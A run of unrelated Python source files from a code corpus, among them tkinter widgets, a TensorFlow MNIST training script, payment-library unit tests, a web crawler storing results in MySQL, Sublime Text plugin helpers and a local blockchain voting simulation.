self.canvas1.tag_bind(self.slider,'<Button-1>',self.slideon)\n self.canvas1.bind('<B1-Motion>',self.mouse_move_slider)\n\n self.update_slider()\n \n def update_slider(self,**kargs):\n\n if 'values' in kargs:\n self.values=kargs['values']\n self.canvas1.itemconfigure(self.valuetext,text=str(\"%.2f\"%self.values['cur'])+' '+self.values['unit'])\n \n self.highvar.set(str(self.values['max'])+' '+self.values['unit'])\n self.elemvar.set(str(self.values['cur'])+' '+self.values['unit'])\n self.lowvar.set(str(self.values['min'])+' '+self.values['unit'])\n\n print (\"update_slide()\", self.values['cur'])\n \n def update_slider_position(self):\n self.move_slider_value(self.values['cur'])\n \n def slider_active(self,*args):\n if self.slider_state==False:\n self.box=self.canvas1.create_rectangle(35,45,65,455,width=1,dash='.')\n self.slider_state=True\n \n def slider_deactive(self,*args):\n #global box\n if self.slider_state==True:\n self.canvas1.delete(self.box)\n self.slider_state=False\n\n def slideon(self,event):\n self.slider_active()\n self.slide_active=True\n\n def slideoff(self,event):\n self.slider_deactive()\n self.slider_state=False\n\n\n def val_from_coord(self,y):\n Vmin=self.values['min']\n Vmax=self.values['max']\n \n m=(Vmin-Vmax)/(450.0-50.0)\n\n return m*(y-450.0)+Vmin\n\n\n def coord_from_val(self,val):\n Vmin=self.values['min']\n Vmax=self.values['max']\n \n m=(Vmin-Vmax)/(450.0-50.0)\n \n return (val-Vmin)/m+450.0\n\n \n def mouse_move_slider(self,event):\n new_x, new_y = event.x, event.y\n x1, y1, x2, y2 = self.canvas1.coords(self.slider)\n\n if ((new_y <= 450)&(new_y>=50)):\n distance=new_y-y2\n if abs(distance)>= self.snap_pixels:\n distance=int((new_y-y2)/self.snap_pixels)*self.snap_pixels\n 
self.canvas1.move(self.slider,0,distance)\n self.slider_position=y2+distance\n\n self.values['cur']=self.val_from_coord(self.slider_position)\n \n self.update_slider()\n\n self.callback(values={'cur':self.values['cur']})\n \n \n def move_slider_value(self,val):\n \"\"\"\n !!! FINISH THIS FUNCTION !!!\n \"\"\"\n \n x1,y1,x2,y2=self.canvas1.coords(self.slider)\n self.values['cur']=val\n self.canvas1.move(self.slider,0,self.coord_from_val(val)-y1)\n \n #self.update_slider()\n\nif __name__=='__main__':\n\n class MainWindow(Tk.Frame):\n def __init__(self,parent):\n Tk.Frame.__init__(self,parent)\n\n #SLIDER FRAME\n Slider_Frame=Tk.Frame(root)\n Slider_Frame.grid(row=0,column=0)\n \n slider_canvas=Tk.Canvas(Slider_Frame)\n slider=SliderFrame(slider_canvas,self.callback)\n\n def callback(self,**kargs):\n print(kargs)\n \n root = Tk.Tk()\n a=MainWindow(root)\n root.mainloop()\n","sub_path":"canvas_slider.py","file_name":"canvas_slider.py","file_ext":"py","file_size_in_byte":5004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"547691161","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport time\r\n\r\nx = np.linspace(-2,4,101)\r\nn = len(x)\r\nu0x = np.empty(n)\r\nvn = np.empty(n)\r\nvn_old = u0x\r\nj=0\r\nLambda = 0.5\r\nfor i in range(0,n):\r\n if abs(x[i]) <= 1:\r\n u0x[i] = 1 - abs(x[i])\r\n else:\r\n u0x[i] = 0\r\n\r\n\r\nwhile j <= 8:\r\n for k in range(0,n-1):\r\n vn[k] = vn_old[k] - Lambda*(vn_old[k+1] - vn_old[k])\r\n vn[0] = 0\r\n vn[n-1] = 0\r\n \r\n \r\n plt.clf()\r\n plt.plot(x,u0x,x,vn,x,vn_old)\r\n plt.show()\r\n time.sleep(1)\r\n vn_old = vn\r\n vn = np.zeros(n)\r\n j += 1","sub_path":"1_3_1.py","file_name":"1_3_1.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"274597312","text":"import pandas as pd\nimport json\n\n\n\nJSON = False\nCSV = True\nSEP = '|' #separator for the csv file\nFORMATTED_INPUT_FILE = 'dataset/final_test_dataset_5_threshold_1500.csv'\nSENTIMENT_FILE = 'sentiment_analysis/final_test_dataset_5_threshold_1500_sentiment.json'\nOUTPUT_FILE = \"sentiment_analysis/final_test_dataset_5_threshold_1500.csv\"\nCLUSTER_FILE = \"\"\nCLUSTER = False\nELIMINATE_OUTLIERS = True\n\n\n\n\ndef average_emotion(target_tweet_analysis, target_emotion):\n\n number_keywords = len(target_tweet_analysis[\"tweet_analysis\"][\"keywords\"])\n total_emotion = 0.0\n for keyword_index in range(number_keywords):\n target_keyword = target_tweet_analysis[\"tweet_analysis\"][\"keywords\"][keyword_index]\n try:\n total_emotion += target_keyword[\"emotion\"][target_emotion]*target_keyword[\"relevance\"]\n except KeyError:\n total_emotion += 0\n\n return total_emotion\n\n\ndef average_sentiment(target_tweet_analysis):\n\n number_keywords = len(target_tweet_analysis[\"tweet_analysis\"][\"keywords\"])\n total_sentiment = 0.0\n for keyword_index in range(number_keywords):\n target_keyword = target_tweet_analysis[\"tweet_analysis\"][\"keywords\"][keyword_index]\n try:\n total_sentiment += target_keyword[\"sentiment\"][\"score\"]*target_keyword[\"relevance\"]\n except KeyError:\n total_sentiment += 0\n\n return total_sentiment\n\n#If the input file is a JSON or a csv file.\n#One of them (only one) must be True\n\nif JSON:\n with open(FORMATTED_INPUT_FILE) as json_data:\n formatted_tweets = json.load(json_data)\n\nelif CSV:\n formatted_tweets = pd.read_csv(FORMATTED_INPUT_FILE, sep=SEP)\n if CLUSTER:\n df_file = 
pd.read_csv(CLUSTER_FILE)\nelse:\n raise Exception(\"Both JSON and CSV are false\")\n\n\nwith open(SENTIMENT_FILE) as json_data:\n tweets_analysis = json.load(json_data)\n\ntweets_csv = open(OUTPUT_FILE, \"w\")\ntweets_csv.write(\"tweet_id|fake|joy|sadness|anger|fear|disgust|sentiment\")\n\nif CLUSTER:\n tweets_csv.write(\"|delta_t|cluster\")\n\ntweets_csv.write(\"\\n\")\n\nif JSON:\n number_tweets = len(formatted_tweets[\"tweets\"])\nelif CSV:\n number_tweets = len(formatted_tweets)\n\nlist_id_formatted_tweets = formatted_tweets[\"id\"].tolist()\n\nfor tweet_analysis_index in range(len(tweets_analysis[\"tweets\"])):\n\n print(tweet_analysis_index, len(tweets_analysis[\"tweets\"]))\n\n analysis_tweet_id = tweets_analysis[\"tweets\"][tweet_analysis_index][\"tweet_id\"]\n if JSON:\n tweet_formatted_index = formatted_tweets[\"tweets\"][\"id\"].index(analysis_tweet_id)\n elif CSV:\n tweet_formatted_index = list_id_formatted_tweets.index(analysis_tweet_id)\n\n target_tweet_analysis = tweets_analysis[\"tweets\"][tweet_analysis_index]\n\n total_joy = average_emotion(target_tweet_analysis, \"joy\")\n total_sadness = average_emotion(target_tweet_analysis, \"sadness\")\n total_anger = average_emotion(target_tweet_analysis, \"anger\")\n total_fear = average_emotion(target_tweet_analysis, \"fear\")\n total_disgust = average_emotion(target_tweet_analysis, \"disgust\")\n total_sentiment = average_sentiment(target_tweet_analysis)\n\n if ELIMINATE_OUTLIERS:\n if total_joy == 0 and total_sadness == 0 and \\\n total_anger == 0 and total_fear == 0 and total_disgust == 0:\n continue\n\n\n tweets_csv.write(str(target_tweet_analysis[\"tweet_id\"]))\n tweets_csv.write(SEP)\n\n if JSON:\n tweets_csv.write(str(formatted_tweets[\"tweets\"][tweet_formatted_index][\"is_fake\"]))\n\n elif CSV:\n tweets_csv.write(str(formatted_tweets[\"is_fake\"].iloc[tweet_formatted_index]))\n\n tweets_csv.write(SEP)\n\n tweets_csv.write(str(total_joy))\n tweets_csv.write(SEP)\n\n tweets_csv.write(str(total_sadness))\n tweets_csv.write(SEP)\n\n tweets_csv.write(str(total_anger))\n tweets_csv.write(SEP)\n\n tweets_csv.write(str(total_fear))\n tweets_csv.write(SEP)\n\n tweets_csv.write(str(total_disgust))\n tweets_csv.write(SEP)\n\n tweets_csv.write(str(total_sentiment))\n tweets_csv.write(SEP)\n\n if CLUSTER:\n tweets_csv.write(str(df_file[\"delta_t\"][tweet_analysis_index]))\n tweets_csv.write(SEP)\n\n tweets_csv.write(str(df_file[\"cluster\"][tweet_analysis_index]))\n tweets_csv.write(\"\\n\")\n\n tweet_formatted_index += 1\n\ntweets_csv.close()\n","sub_path":"backend/dataset_creation.py","file_name":"dataset_creation.py","file_ext":"py","file_size_in_byte":4296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"366888361","text":"from tests.test_helper import *\nfrom datetime import datetime\nfrom datetime import date\n\nclass TestTransaction(unittest.TestCase):\n @raises_with_regexp(KeyError, \"'Invalid keys: bad_key'\")\n def test_clone_transaction_raises_exception_with_bad_keys(self):\n Transaction.clone_transaction(\"an id\", {\"bad_key\": \"value\"})\n\n @raises_with_regexp(KeyError, \"'Invalid keys: bad_key'\")\n def test_sale_raises_exception_with_bad_keys(self):\n Transaction.sale({\"bad_key\": \"value\"})\n\n @raises_with_regexp(KeyError, \"'Invalid keys: credit_card\\[bad_key\\]'\")\n def test_sale_raises_exception_with_nested_bad_keys(self):\n Transaction.sale({\"credit_card\": {\"bad_key\": \"value\"}})\n\n @raises_with_regexp(KeyError, \"'Invalid keys: bad_key'\")\n 
def test_tr_data_for_sale_raises_error_with_bad_keys(self):\n Transaction.tr_data_for_sale({\"bad_key\": \"value\"}, \"http://example.com\")\n\n @raises(NotFoundError)\n def test_finding_empty_id_raises_not_found_exception(self):\n Transaction.find(\" \")\n\n @raises(NotFoundError)\n def test_finding_none_raises_not_found_exception(self):\n Transaction.find(None)\n\n def test_constructor_includes_disbursement_information(self):\n attributes = {\n 'amount': '27.00',\n 'tax_amount': '1.00',\n 'customer_id': '4096',\n 'merchant_account_id': '8192',\n 'order_id': '106601',\n 'channel': '101',\n 'payment_method_token': 'sometoken',\n 'purchase_order_number': '20202',\n 'recurring': 'False',\n 'disbursement_details': {\n 'settlement_amount': '27.00',\n 'settlement_currency_iso_code': 'USD',\n 'settlement_currency_exchange_rate': '1',\n 'disbursement_date': date(2013, 4, 10),\n 'funds_held': False\n }\n }\n\n transaction = Transaction(None, attributes)\n\n self.assertEqual(transaction.disbursement_details.settlement_amount, Decimal('27.00'))\n self.assertEqual(transaction.disbursement_details.settlement_currency_iso_code, 'USD')\n self.assertEqual(transaction.disbursement_details.settlement_currency_exchange_rate, Decimal('1'))\n self.assertEqual(transaction.disbursement_details.disbursement_date, date(2013, 4, 10))\n self.assertEqual(transaction.disbursement_details.funds_held, False)\n self.assertEqual(transaction.is_disbursed, True)\n\n def test_transaction_handles_nil_risk_data(self):\n attributes = {\n 'amount': '27.00',\n 'tax_amount': '1.00',\n 'customer_id': '4096',\n 'merchant_account_id': '8192',\n 'order_id': '106601',\n 'channel': '101',\n 'payment_method_token': 'sometoken',\n 'purchase_order_number': '20202',\n 'recurring': 'False',\n }\n\n transaction = Transaction(None, attributes)\n\n self.assertEqual(transaction.risk_data, None)\n\n def test_is_disbursed_false(self):\n attributes = {\n 'amount': '27.00',\n 'tax_amount': '1.00',\n 'customer_id': '4096',\n 'merchant_account_id': '8192',\n 'order_id': '106601',\n 'channel': '101',\n 'payment_method_token': 'sometoken',\n 'purchase_order_number': '20202',\n 'recurring': 'False',\n 'disbursement_details': {\n 'settlement_amount': None,\n 'settlement_currency_iso_code': None,\n 'settlement_currency_exchange_rate': None,\n 'disbursement_date': None,\n 'funds_held': None,\n }\n }\n\n transaction = Transaction(None, attributes)\n\n self.assertEqual(transaction.is_disbursed, False)\n","sub_path":"tests/unit/test_transaction.py","file_name":"test_transaction.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"324622364","text":"# relative to my_mnist_8.py: plot test set accuracy in steps as well\n# my way of doing this is to train and save checkpoints first; then load the checkpoints successively to make predictions on the test\n# batches (model 200 applied to first test batch, model 400 applied to second test batch, model 600 applied to third test batch, etc)\n\nimport argparse\nimport sys\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport tensorflow as tf\nimport numpy as np\nimport os\n\nFLAGS = None\ntf.summary.FileWriterCache.clear()\n\ndef weight_variable(shape):\n '''use this function to initialize weights of given shape'''\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\ndef bias_variable(shape):\n '''use this function to initialize biases of given shape'''\n initial = 
tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\ndef conv2d(x, W):\n '''\n x: input tensor (batch_size, height, width, input_channels)\n W: filter tensor (filter_height, filter_width, input_channels, num_of_filters)\n output: (batch_size, output_height, output_width, num_of_filters)\n '''\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\ndef max_pool_2x2(x):\n '''\n x: input tensor (batch_size, height, width, input_channels)\n output: (batch_size, output_height, output_width, input_channels)\n '''\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1], padding='SAME')\n\ndef main(_):\n \n # Import data\n mnist = tf.contrib.learn.datasets.load_dataset(\"mnist\")\n train_data = tf.data.Dataset.from_tensor_slices(mnist.train.images) # mnist.train.images is np.array\n train_labels = tf.data.Dataset.from_tensor_slices(np.asarray(mnist.train.labels, dtype=np.int32)).map(lambda z: tf.one_hot(z, 10))\n train_dataset = tf.data.Dataset.zip((train_data, train_labels)).repeat().batch(100)\n\n eval_data = tf.data.Dataset.from_tensor_slices(mnist.test.images) \n eval_labels = tf.data.Dataset.from_tensor_slices(np.asarray(mnist.test.labels, dtype=np.int32)).map(lambda z: tf.one_hot(z, 10))\n eval_dataset = tf.data.Dataset.zip((eval_data, eval_labels)).repeat().batch(1000)\n\n # create general iterator\n iterator = tf.data.Iterator.from_structure(train_dataset.output_types, train_dataset.output_shapes)\n next_element = iterator.get_next()\n\n # define initialization operations by dataset type\n training_init_op = iterator.make_initializer(train_dataset)\n eval_init_op = iterator.make_initializer(eval_dataset)\n\n W_conv1 = weight_variable([5, 5, 1, 32]) # weights of first conv layer\n b_conv1 = bias_variable([32]) # biases of first conv layer\n x_image_summary = tf.summary.image('input', tf.reshape(next_element[0], [-1, 28, 28, 1]), 3)\n x_image = tf.reshape(next_element[0], [-1,28,28,1]) # reshape x into 2d images\n h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1) # first layer convolution followed by relu activation\n h_pool1 = max_pool_2x2(h_conv1) # first max pool\n W_conv2 = weight_variable([5, 5, 32, 64]) # weights of second conv layer\n b_conv2 = bias_variable([64]) # biases of second conv layer\n h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2) # second layer convolution followed by relu activation\n h_pool2 = max_pool_2x2(h_conv2) # second max pool\n W_fc1 = weight_variable([7 * 7 * 64, 1024]) # weights of first fully connected layer\n b_fc1 = bias_variable([1024]) # biases of first fully connected layer\n h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64]) # flatten the output from second max pool\n h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1) # output of first fully connected layer\n keep_prob = tf.placeholder(tf.float32) # dropout probability\n h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob) # modify output of first fully connected layer by dropout\n W_fc2 = weight_variable([1024, 10]) # weights of second fully connected layer\n b_fc2 = bias_variable([10]) # biases of second fully connected layer\n y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2 # output of second fully connected layer\n cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=next_element[1], logits=y_conv)) # loss operation\n train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy) # train operation \n correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(next_element[1], 1))\n accuracy = 
tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n accuracy_scalar = tf.summary.scalar(\"accuracy\",accuracy)\n\n # Add ops to save and restore all the variables.\n home = os.getenv('HOME')\n save_path = home + '/Deep_Learning_Examples/MNIST_tensorflow/checkpoints/'\n model_name = 'my_model'\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n saver = tf.train.Saver()\n save_path_full = os.path.join(save_path, model_name)\n\n # let the session begin\n sess = tf.InteractiveSession()\n tf.global_variables_initializer().run()\n\n # define writers\n summaries_dir = home + '/Deep_Learning_Examples/MNIST_tensorflow/board'\n train_writer = tf.summary.FileWriter(summaries_dir + '/train', sess.graph)\n test_writer = tf.summary.FileWriter(summaries_dir + '/test')\n\n # Train\n sess.run(training_init_op)\n for step in range(1000):\n sess.run(train_step, feed_dict={keep_prob: 0.5})\n if (step+1) % 20 == 0:\n sum1 = sess.run(x_image_summary)\n sum2 = sess.run(accuracy_scalar, feed_dict={keep_prob: 1})\n train_writer.add_summary(sum1,step)\n train_writer.add_summary(sum2,step)\n\n if (step+1) % 200 == 0:\n save_path_destination = saver.save(sess, save_path_full, step+1)\n print(\"Model {} saved in path {}\".format(step+1, save_path_destination))\n\n # Test trained model\n sess.run(eval_init_op)\n for step in range(1000):\n if (step + 1) % 200 == 0:\n new_saver = tf.train.import_meta_graph(save_path + 'my_model-' + str(step+1) + '.meta')\n new_saver.restore(sess, save_path + 'my_model-' + str(step+1))\n sum3, validation_accuracy = sess.run([accuracy_scalar, accuracy], feed_dict={keep_prob: 1})\n test_writer.add_summary(sum3, step)\n print(validation_accuracy)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--data_dir', type=str, default='/tmp/tensorflow/mnist/input_data',\n help='Directory for storing input data')\n FLAGS, unparsed = parser.parse_known_args()\n tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)","sub_path":"MNIST_tensorflow/code/my_mnist_9.py","file_name":"my_mnist_9.py","file_ext":"py","file_size_in_byte":6387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"535167139","text":"import tkinter as tk\r\nfrom tkinter import ttk\r\n\r\nfrom extendedTk import FadingLabel\r\nfrom extendedStyle import style_configure\r\n\r\nclass Statusbar(tk.Frame):\r\n def __init__(self, master=None, **kw):\r\n tk.Frame.__init__(self, master, {}, **kw)\r\n\r\n self.status = FadingLabel(self, text=\"Status\")\r\n\r\n self.insert_pos = tk.StringVar()\r\n label = ttk.Label(self, textvariable=self.insert_pos)\r\n self.insert_pos.set(\"Ln: -| Col: -\")\r\n\r\n # style \r\n style_configure(self, \"Statusbar\")\r\n style_configure(self.status, \"Statusbar.Child\")\r\n style_configure(label, \"Statusbar.Child\")\r\n\r\n # grid\r\n self.columnconfigure(1, weight=1)\r\n\r\n self.status.grid(row=0, column=0, sticky=tk.W, padx=8, pady=2)\r\n label.grid(row=0, column=1, sticky=tk.E, padx=32, pady=2)\r\n\r\n def write(self, msg):\r\n self.status.write(msg)\r\n\r\n def update_insert_label(self, event):\r\n ln, col = event.widget.index(\"insert\").split(\".\")\r\n self.insert_pos.set(\"Ln: {}| Col: {}\".format(ln, col))\r\n\r\n ","sub_path":"statusbar.py","file_name":"statusbar.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"39710314","text":"class Solution:\n def postorder(self, root: 'Node') -> List[int]:\n 
stack=[]\n order=[]\n if root:\n stack.append(root)\n while stack:\n node=stack.pop()\n order.append(node.val)\n for child in node.children:\n stack.append(child)\n return reversed(order)\n","sub_path":"lc/590.py","file_name":"590.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"136772189","text":"# Multiple inputs and outputs\ndef scal_sum(matrix, matrix2):\n sum = 0\n for i in range(len(matrix)):\n sum += matrix[i] * matrix2[i]\n return sum\n\n\n# Long live spaghetti code!!!!\ninput = [0.5, 0.3, 0.2]\ngoal_pred = [1, 0, 2]\nweight = [[0.5, 2, 1],\n [0.3, 0.7, 2],\n [1, 4, 1]]\nalpha = 0.1\npred = [0, 0, 0]\n\nfor iter in range(0, 100):\n print(f\"{iter}\")\n\n pred[0] = scal_sum(input, weight[0])\n pred[1] = scal_sum(input, weight[1])\n pred[2] = scal_sum(input, weight[2])\n\n # Update the weights of the first output\n delta = (pred[0] - goal_pred[0]) * alpha\n for i in range(0, 3):\n weight[0][i] = weight[0][i] - delta * input[i]\n\n delta = (pred[1] - goal_pred[1]) * alpha\n for i in range(0, 3):\n weight[1][i] = weight[1][i] - delta * input[i]\n\n delta = (pred[2] - goal_pred[2]) * alpha\n for i in range(0, 3):\n weight[2][i] = weight[2][i] - delta * input[i]\n\n print(f\"\\t 1: W1 :{weight[0][0]} W2 :{weight[0][1]} W3 :{weight[0][2]} Pred: {pred[0]} GoalPred: {goal_pred[0]}\")\n print(f\"\\t 2: W1 :{weight[1][0]} W2 :{weight[1][1]} W3 :{weight[1][2]} Pred: {pred[1]} GoalPred: {goal_pred[1]}\")\n print(f\"\\t 3: W1 :{weight[2][0]} W2 :{weight[2][1]} W3 :{weight[2][2]} Pred: {pred[2]} GoalPred: {goal_pred[2]}\")\n","sub_path":"Control/2_controll.py","file_name":"2_controll.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"308544597","text":"import html_downloader, html_parser\nimport sqlproc\nimport time, random\n\nif __name__ == '__main__':\n print(\"############ Starting......\")\n\n host = 'localhost'\n port = 3306\n username = 'root'\n password = 'root'\n db = 'cola'\n charset = 'utf8'\n sp = sqlproc.SqlProc(host, port, username, password, db, charset)\n downloader = html_downloader.HtmlDownloader()\n parser = html_parser.HtmlParser()\n\n select_sql = \"select id, ifcrawed, link from linkstat limit %s, %s\"\n update_sql = \"update linkstat set ifcrawed = 1 where id = %s\"\n insert_sql = \"insert into commonsense(arttitle, summary, artcont) values(%s, %s, %s)\"\n\n n = 100\n totalcount = 5760 # needs updating\n no_lst = list(range(0, totalcount, 100))\n no_lst.append(totalcount)\n\n for no in no_lst:\n if totalcount - no < 100:\n n = totalcount - no\n\n lst_link = sp.selectData(select_sql, (no, n))\n if lst_link == -1:\n '''Query failed, skip this batch'''\n continue\n\n for link in lst_link:\n print('crawling...... {}'.format(link), end=\" \")\n uid = link['id']\n url = link['link']\n ifcrawed = link['ifcrawed']\n\n if ifcrawed == 1:\n '''This link has already been crawled, skip it'''\n continue\n\n html_cont = downloader.download(url)\n if html_cont is None:\n '''Fetched content is empty, skip it'''\n continue\n\n parse_result = parser.parse(html_cont)\n if parse_result is not None:\n print(parse_result, end=\" \")\n bs, code = sp.insertData(insert_sql, parse_result)\n if bs:\n print('Insert succeeded: 
record {}.'.format(code), end=\" \")\n if sp.updateData(update_sql, uid):\n print('Update succeeded, Done!')\n else:\n print('Update failed, Undo!')\n else:\n print('Insert failed!')\n else:\n print('Crawl failed!')\n time.sleep(random.random())\n","sub_path":"crawcommsens/spider_main.py","file_name":"spider_main.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"389418070","text":"import subprocess\nimport json\nimport os\n\nimport sublime\n\nSETTINGS_FILE = 'Gide.sublime-settings'\n\n\ndef set_status(msg):\n \"\"\"Print a message to the active window's status bar.\n \"\"\"\n msg = 'Gide: {0}'.format(msg)\n sublime.active_window().active_view().set_status('Gide', msg)\n\n\ndef info_for_symbol(view, point):\n \"\"\"Extract information about the symbol given by `point`.\n \"\"\"\n filename = view.file_name()\n if not filename:\n return {}\n\n pos = '{0}:#{1}'.format(filename, point)\n buf = view.substr(sublime.Region(0, view.size()))\n stdout, stderr, ret = run_command(\n ['gogetdoc', '-u', '-json', '-modified', '-pos', pos],\n '{0}\\n{1}\\n{2}'.format(filename, view.size(), buf))\n\n if ret != 0:\n debug('No signature for {0}'.format(pos))\n return {}\n\n return json.loads(stdout)\n\n\ndef debug(message, prefix='Gide', level='debug'):\n \"\"\"Print a formatted entry to the console.\n\n Args:\n message (str): A message to print to the console\n prefix (str): An optional prefix\n level (str): One of debug, info, warning, error [Default: debug]\n\n Returns:\n str: Issue a standard console print command.\n \"\"\"\n if get_setting('debug'):\n print('{prefix}: [{level}] {message}'.format(\n message=message,\n prefix=prefix,\n level=level\n ))\n\n\ndef get_setting(name):\n \"\"\"Return the value associated with the setting `name`.\n \"\"\"\n settings = sublime.load_settings(SETTINGS_FILE)\n return settings.get(name, '')\n\n\ndef set_setting(name, value):\n \"\"\"Store and save `name` as `value`.\n \"\"\"\n settings = sublime.load_settings(SETTINGS_FILE)\n settings.set(name, value)\n sublime.save_settings(SETTINGS_FILE)\n\n\ndef load_template(name):\n \"\"\"...\n \"\"\"\n p = os.path.join(os.path.dirname(__file__), os.pardir, 'templates', name)\n with open(p) as temp:\n return temp.read()\n\n\ndef is_golang(view, point=None):\n \"\"\"Return if the given view is Golang source.\n \"\"\"\n if point is None:\n point = view.sel()[0].begin()\n return view.score_selector(point, 'source.go') > 0\n\n\ndef run_command(command, stdin=None):\n \"\"\"Run the given command.\n \"\"\"\n startup_info = None\n if sublime.platform() == 'windows':\n startup_info = subprocess.STARTUPINFO()\n startup_info.dwFlags |= subprocess.STARTF_USESHOWWINDOW\n\n p = subprocess.Popen(command,\n stdin=subprocess.PIPE,\n stderr=subprocess.PIPE,\n stdout=subprocess.PIPE,\n startupinfo=startup_info)\n\n if stdin:\n stdout, stderr = p.communicate(stdin.encode('utf-8'))\n else:\n stdout, stderr = p.communicate()\n\n return stdout.decode('utf-8'), stderr.decode('utf-8'), p.returncode\n","sub_path":"src/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"566130824","text":"import random\nimport sys\nimport time\nfrom uuid import uuid4\nimport logging\nimport requests\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n\n# CANDIDATES = [\"Narendra Modi\", \"Rahul Gandhi\", \"Arvind Kejriwal\"]\nCANDIDATES = [\"Candidate 1\", 
\"Candidate 2\", \"Candidate 3\"]\nSERVERS = [\"5000\", \"5001\", \"5002\", \"5003\"]\n\n\ndef register_nodes():\n for server in SERVERS:\n try:\n logging.info(\"> Registering server: \" + \"127.0.0.1:\" + server)\n node_url = \"http://127.0.0.1:\" + server + \"/nodes/register\"\n for s in SERVERS:\n data = {\n \"nodes\": [],\n \"new-node\": \"127.0.0.1:\" + s\n }\n requests.post(node_url, json=data)\n except Exception as e:\n logging.info(str(e))\n\n\ndef votes(max_count):\n count = 0\n while count < max_count:\n count += 1\n delay = random.randrange(1, 3)\n time.sleep(delay)\n candidate = CANDIDATES[random.randrange(0, 3)]\n t = {\n \"nodes\": [],\n \"transaction\": {\n \"sender\": str(uuid4()),\n \"recipient\": candidate,\n \"amount\": 1,\n \"uuid\": str(uuid4())\n }\n }\n try:\n server = SERVERS[random.randrange(0, 4)]\n logging.info(\"> Sending vote for \" + candidate + \" to server: \" + server)\n requests.post(\"http://localhost:\" + server + \"/transactions/new\", json=t)\n except Exception as e:\n logging.error(str(e))\n\n\ndef stop():\n try:\n for server in SERVERS:\n logging.info(\"> Stopping server: \" + server)\n node_url = \"http://127.0.0.1:\" + server + \"/stop\"\n requests.get(node_url)\n requests.get(\"http://127.0.0.1:5000/mine\")\n except Exception as e:\n logging.error(str(e))\n\n\ndef forks():\n try:\n for server in SERVERS:\n node_url = \"http://127.0.0.1:\" + server + \"/nodes/forks\"\n resp = requests.get(node_url)\n data = resp.json()\n logger.info(\"Number of discarded blocks:\" + str(data))\n except Exception as e:\n logging.error(str(e))\n\n\ndef results():\n try:\n prev = None\n for server in SERVERS:\n\n result = {}\n for candidate in CANDIDATES:\n result.update({candidate: 0})\n node_url = \"http://127.0.0.1:\" + server + \"/chain\"\n resp = requests.get(node_url)\n chain = resp.json()[\"chain\"]\n for block in chain:\n for txt in block[\"transactions\"]:\n result[txt[\"recipient\"]] += 1\n prev = result\n # logging.info(\"Server:\" + server + \" result: \" + str(result))\n logging.info(\"Server result: \" + str(prev))\n except Exception as e:\n logging.error(str(e))\n\n\ndef run(num_votes):\n register_nodes()\n votes(num_votes)\n stop()\n results()\n forks()\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n print(\"Usage: python simulation.py <num_votes>\")\n sys.exit(1)\n run(int(sys.argv[1]))\n","sub_path":"blockchain/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":3127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"101372129","text":"# coding: utf-8\n\n\ndef build_entry_ui_url(ice_base_url, entry_id):\n \"\"\"\n Builds the URL for client access to an ICE entry via ICE's user interface.\n\n :param ice_base_url: the base URL of the ICE instance (assumed to NOT end with a slash)\n :param entry_id: an ICE identifier for the part. This can be any of 1) The UUID (preferred\n as universally unique), 2) The ICE part number (more likely, though not guaranteed to be\n universally unique), 3) The local ICE primary key for the part.\n Note that in *some* but not all cases, the numeric portion of the ICE part number\n corresponds to the local primary key. 
